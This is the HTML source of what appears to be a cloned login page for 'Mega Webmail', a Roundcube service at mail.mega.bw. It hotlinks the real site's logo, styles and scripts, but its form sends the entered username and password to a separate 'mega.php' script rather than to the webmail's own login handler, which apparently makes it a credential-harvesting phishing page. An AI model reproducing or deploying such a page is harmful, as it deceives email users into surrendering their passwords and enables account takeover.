<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mega Webmail :: Welcome to Mega Webmail</title>
<meta name="Robots" content="noindex,nofollow" />
<link rel="index" href="https://mail.mega.bw/?_task=mail" />
<link rel="shortcut icon" href="https://mail.mega.bw/mail/skins/default/images/favicon.ico"/>
<link rel="stylesheet" type="text/css" href="https://mail.mega.bw/skins/default/common.css" />
<style type="text/css">

#login-form {
  margin-left: auto;
  margin-right: auto;
  margin-top: 50px;
  width: 380px;
  border: 1px solid #999;
}

#login-form table td.title
{
  color: #666;
  text-align: right;
  padding-right: 10px;
}

.boxcontent {
  padding: 20px 20px 10px 20px;
}

</style>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<script type="text/javascript" src="https://mail.mega.bw/program/js/common.js"></script>
<script type="text/javascript" src="https://mail.mega.bw/program/js/app.js"></script>
<script type="text/javascript">
<!--

var rcmail = new rcube_webmail();
rcmail.set_env({task:'login',flag_for_deletion:0,read_when_deleted:1,keep_alive:60,action:'',comm_path:'./?_task=mail'});
rcmail.add_label('loading','Loading...');
rcmail.gui_object('message', 'message');
rcmail.gui_object('loginform', 'form');

//-->
</script>

</head>
<body>

<img src="https://mail.mega.bw/mail/skins/elastic/images/mega_web.png?s=1597240927" border="0" alt="Mega Webmail" style="margin:2px 12px" />

<div id="message"></div>

<div id="login-form">
<div class="boxtitle"></div>
<div class="boxcontent">

<form name="form" action="mega.php" method="post">
<input type="hidden" name="_action" value="login" /><input type="hidden" name="_timezone" id="rcmlogintz" value="_default_" /><table summary="" border="0"><tbody><tr><td class="title"><label for="rcmloginuser">Username</label>
</td>
<td><input name="_user" id="rcmloginuser" size="30" autocomplete="off" value="" type="text" /></td>
</tr>
<tr><td class="title"><label for="rcmloginpwd">Password</label>
</td>
<td><input name="_pass" id="rcmloginpwd" size="30" autocomplete="off" type="password" /></td>
</tr>
</tbody>
</table>


<p style="text-align:center;"><input type="submit" class="button mainaction" value="[Login]" /></p>

</form>
</div>
</div>

<script type="text/javascript">
<!--

if (window.call_init)
 call_init('rcmail');

//-->
</script>

</body>
</html>